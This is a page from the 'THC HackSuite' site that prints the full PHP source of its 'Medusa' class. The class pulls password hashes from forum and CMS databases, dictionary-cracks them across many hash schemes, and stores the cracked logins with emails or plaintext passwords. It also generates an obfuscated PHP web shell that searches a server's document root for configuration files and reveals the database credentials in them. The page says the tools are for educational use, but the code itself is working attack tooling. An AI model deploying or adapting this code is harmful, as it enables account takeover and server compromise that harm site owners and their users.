random gallery image
random tutorial
preview

..I will show you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all..

read more

random information gathering
THC Discover

Discovers interesting locations, paths and data of a website

more about this module
more of this category
more modules

HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Contains all functionality for Medusa.

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/

/* THC Medusa Class */
class THC{
    var 
$aWords "";
    var 
$aProperties "";
    var 
$aUserHash "";
    
/* main */
    
function THC(){
    }
    
/* safely load wordlist while preventing file injection vulnerabilities */
    
function LoadWordlist($sWordlist){
        
$sWordlist "../../Wordlists/".$this->ExploitFilter($sWordlist,0,1);
        if(
false===($aFileData = @file($sWordlist))){
            return(
false);
        }
        
$this->aWords $aFileData;
        return(
true);
    }
    
/* safely load properties from a configuration file while preventing file injection vulnerabilities */
    
function LoadProperties($sProduct){
        
$sProduct "../forums/".$this->ExploitFilter($sProduct,0,1);
        if(!
file_exists($sProduct)){
            return(
false);
        }
        include_once(
$sProduct);
        
$this->aProperties $_PROPERTIES;
        return(
true);
    }
    
/* execute universal load users query and stores them in var $aUserHash */
    
function LoadUsers(){
        
$rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
        
// UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
        // $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
        
$this->aProperties['total'] = @mysql_num_rows($rQuery);
        
$this->aUserHash = array();
        if(
$this->aProperties['total']!=0){
            while(
false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
                
$this->aUserHash[] = $aRow;
            }
        }
    }
    
/* black hat one user cracking */
    
function SetUser($aUser){
        
$this->aUserHash[] = $aUser;
    }
    
/* returns the email address of a user */
    
function GetEmail($sUser){
        
$rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
        return(@
mysql_result($rQuery,0,'temail'));
    }
    
/* checks whether the encrypted password matches the hash from the database */
    
function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
        
$sEncrypt "";
        
$sPass trim($sPass);
        switch(
$this->aProperties['name']){
            case
"SMF1":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"SMF2":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"MyBB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"IPB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"vBulletin4":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin3":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin5":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"FluxBB":
            
$sEncrypt = @sha1($sPass);
            break;
            case
"phpBB":
            return(
phpbb_check_hash($sPass,$sHash) ? true false);
            break;
            case
"Drupal6":
            
$sEncrypt = @md5($sPass);
            break;
            case
"Drupal7":
            return(
user_check_password2($sPass,$sHash) ? true false);
            break;
            case
"Dolphin":
            
$sEncrypt sha1(md5($sPass).$sSalt);
            break;
            case
"Joomla3":
            return(
PassHashing($sPass,$sHash) ? true false);
            break;
            case
"Joomla2":
            return(
PassHashing2($sPass,$sHash) ? true false);
            break;
            case
"Wordpress":
            
$cWP = new PasswordHash();
            return(
$cWP->CheckPassword($sPass,$sHash) ? true false);
            case
"Vanilla":
            
$cVanilla = new Gdn_PasswordHash2();
            return(
$cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true false);            
            break;
            case
"AEF":
            
$sEncrypt md5($sSalt.$sPass);
            break;
            case
"MiniBB":
            
$sEncrypt md5($sPass);
            break;
            case
"Phorum":
            
$sEncrypt md5($sPass);
            break;
            case
"UseBB":
            
$sEncrypt md5($sPass);
            break;
            case
"phpFusion":
            
$sEncrypt hash_hmac("sha256",$sPass,$sSalt);
            break;
            case
"AVS":
            
$sEncrypt md5($sPass);
            break;
            case
"XMB":
            
$sEncrypt md5($sPass);
            break;
        }
        return(
$sEncrypt==$sHash true false);
    }
    
/* creates serialized data so you can keep track of the session's progress */
    
function CrackUsers($iType){
        
$iUsers count($this->aUserHash);
        if(
$iUsers!=0){
            
// if there are users to crack
            
$aData = array();
            
$aData['tstart'] = time();
            
$aData['total'] = $iUsers;
            
$aData['product'] = $this->aProperties['name'];
            
$aData['version'] = $this->aProperties['version'];
            
$aData['matches'] = 0;
            
$aData['start'] = date('d-m H:i',$aData['tstart']);
            
$aData['current'] = 0;
            
$aData['last_user'] = "";
            
$aData['users'] = array();
            
// create session identifier and filename to store the results into
            
$sFileSession substr(sha1(time().mt_rand(0,10000)),0,10);
            
$sResultsFile "results/".$sFileSession.".txt";
            
$aData['identifier'] = $sFileSession;
            
// create results file
            
$this->WriteF($sResultsFile,serialize($aData),"w");
            
// insert record into task file
            
$this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
            for(
$x=0;$x<$iUsers;$x++){
                
$aData['current']++;
                if(
is_int($aData['current']/10)){
                    
$this->WriteF($sResultsFile,serialize($aData),"w");
                }
                for(
$y=0;$y<count($this->aWords);$y++){
                    if(@
$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
                        
// easy user password, store the email and username
                        
$aData['matches']++;
                        
$aData['last_user'] = $this->aUserHash[$x]['crackuser'];
                        if(
$iType==0){ 
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
                        }
                        else{
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
                        }
                        
$this->WriteF($sResultsFile,serialize($aData),"w");
                        continue;
                    }
                }
            }
            
// finalize record in task file
            
$this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
            
// finalize record in data file
            
$this->WriteF($sResultsFile,serialize($aData),"w");

        }
    }
    
/* gets the result file for the scan and returns it as a json structure */
    
function CreateJSON($aData){
        
$aRecords = array();
        for(
$x=0;$x<count($aData);$x++){
            
// every iteration is a (running) task
            
$sData = @file_get_contents("results/".$aData[$x][0].".txt");
            if(
$sData!=false){
                
$aRecords[] = @unserialize($sData);
            }
        }
        return(
json_encode($aRecords));
    }
    
/* fetches all filenames from a directory */
    
function GetFilesByDirectory($sDir){
        if(!
$rHandle = @opendir($sDir)){
            return(
false);
        }
        
$aFileBuffer = array();
        while(
false!==($sFile = @readdir($rHandle))){
            
// buffer all files
            
if($sFile!="." && $sFile!=".."){
                if(!
is_dir($sDir."/".$sFile)){
                    
$aFileBuffer[] .= $sFile;
                }
            }
        }
        @
closedir($rHandle);
        return 
$aFileBuffer;
    }
    
/* fetches all php files from a directory and it's sub directories */
    
function GetPHPFiles($sDir){
        
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        
$aData = array();
        foreach(
$iterator as $path){
              if(!
$path->isDir()){
                 
$aData[] = ($path->__toString());
              }
        }
        return(
$aData);
    }
    
/* fetches all files that can be created for shell management */
    
function GetSystemFiles($sDir){
        
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        
$aData = array();
        foreach(
$iterator as $path){
            unset(
$_SYSTEM);
              if(!
$path->isDir()){
                
$sPath $path->__toString();
                include_once(
$sPath);
                if(isset(
$_SYSTEM)){
                     
$aData[] = $sPath;
                }
              }
        }
        return(
$aData);
    }
    
/* opens a (task) file and split every line into pieces */
    
function RawToArray($sFile,$sSeparate="|"){
        if(!
$aFileData = @file($sFile)){
            return(
false);
        }
        
$aDataBuffer = array();
        for(
$x=0;$x<count($aFileData);$x++){
            if(!
$aDataBuffer[$x] = @explode($sSeparate,$aFileData[$x])){
                if(
$aFileData[$x]==""){
                    continue;
                }
            }
        }
        return(
$aDataBuffer);
    }
    
/* used for preventing LFI exploits in file requests */
    
function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
        if(
$bXSS==false && $bFI==false && $bSQL==false){
            return(
$sString);
        }
        if(!
is_string($sString)){
            return(
$sString);
        }
        if(
$bXSS){
            
$sString strip_tags($sString);
        }
        if(
$bFI){
            
$sString str_replace("../","",$sString);
            
$sString str_replace("./","",$sString);
            
$sString preg_replace('[^a-zA-Z0-9\-_\.\/ ]','',$sString);
        }
        if(
$bSQL){
            
$sString mysql_real_escape_string($sString);
        }
        return(
$sString);
    }
    
/* writes data to a file, overwrites it or creates a new file with the content in $sWrite */
    
function WriteF($sDest,$sWrite,$sMode="a"){
        if(
$sMode!="a" && $sMode!="w"){
            
$sMode "a";
        }
        if(!
$rNew = @fopen($sDest,$sMode)){
            return(
false);
        }
        @
fputs($rNew,$sWrite);
        @
fclose($rNew);
        return(
true);
    }
    
/* creates the database connection and selects the specified database */
    
function MySQLConnect($aCredentials){
        
$rConnect = @mysql_connect($aCredentials['host'],$aCredentials['username'],$aCredentials['password']);
        @
mysql_select_db($aCredentials['database']);
    }
    
/* creates a medusa shell */
    
function MedusaShell($aSystem,$aOptions){
        
$sShell "set_time_limit(0);\n";
        
$sTemplate "";
        if(isset(
$aOptions['ip'])){
            
// ip protection
            
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
            
$sShell .= "    header(\"Location: http://www.google.com\");\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        if(isset(
$aOptions['pass'])){
            
// password protection
            
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
            
$sShell .= "    echo'<html>\n";
            
$sShell .= "    <head></head>\n";
            
$sShell .= "    <body>\n";
            
$sShell .= "    <form method=\"post\">\n";
            
$sShell .= "    <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
            
$sShell .= "    </form>\n";
            
$sShell .= "    </body>\n";
            
$sShell .= "    </html>';\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        
// create shell based on system array
        
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
        
$sShell .= "foreach(\$iterator as \$path){\n";
        
$sShell .= "    if(!\$path->isDir()){\n";
        
$sShell .= "        \$sPath = \$path->__toString();\n";
        
$sShell .= "        \$sFile = \"".$aSystem['file']."\";\n";
        
$sShell .= "        if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
        
$sShell .= "            \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
        
$sShell .= "        }\n";
        
$sShell .= "        if(strpos(\$sPath,\$sFile)!==false){\n";
        
$sShell .= "            \$sData = file_get_contents(\$sPath);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
        
$sShell .= "            if(!isset(\$aUser[1])){\n";
        
$sShell .= "                continue;\n";
        
$sShell .= "            }\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
        
$sShell .= "            \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
        
$sShell .= "            die(\$sResult);\n";
        
$sShell .= "        }\n";
        
$sShell .= "    }\n";
        
$sShell .= "}\n";
        
$sShell .= "die(\"Failed to get login information.\");\n";
        if(isset(
$aOptions['encrypt'])){
            
// source protection
            
if($aOptions['encrypt']=="normal"){
                
$sShell "eval(base64_decode('".base64_encode($sShell)."'));\n";
            }
            else{
                
$sEncoder "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
                
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
                
$sEncoder .= "\$aF = array();\n";
                
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
                
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
                
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
                
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
                
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
                
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
                
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
                
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
                // encode and decode functions
                
$_ENCODE = array();
                
$_ENCODE[0] = array(7,"gzcompress");
                
$_ENCODE[1] = array(4,"base64_encode");
                
$_DECODE = array();
                
$_DECODE[0] = array(6,"gzuncompress");
                
$_DECODE[1] = array(5,"base64_decode");
                
// good luck decrypting the shell :p
                
$iEncryptions count($_ENCODE)-1;
                
$iEncryptionLoops mt_rand(120,150);
                for(
$x=0;$x<$iEncryptionLoops;$x++){
                    
$iEncryption mt_rand(0,$iEncryptions);
                    
$sShell "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
                }
                
$sShell $sEncoder.$sShell.";";
            }
        }
        if(isset(
$aOptions['shellcreate'])){
            
// save source
            
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
        }
        else{
            
$sShell str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
            return(
$sShell);
        }
    }
}
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 3836
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.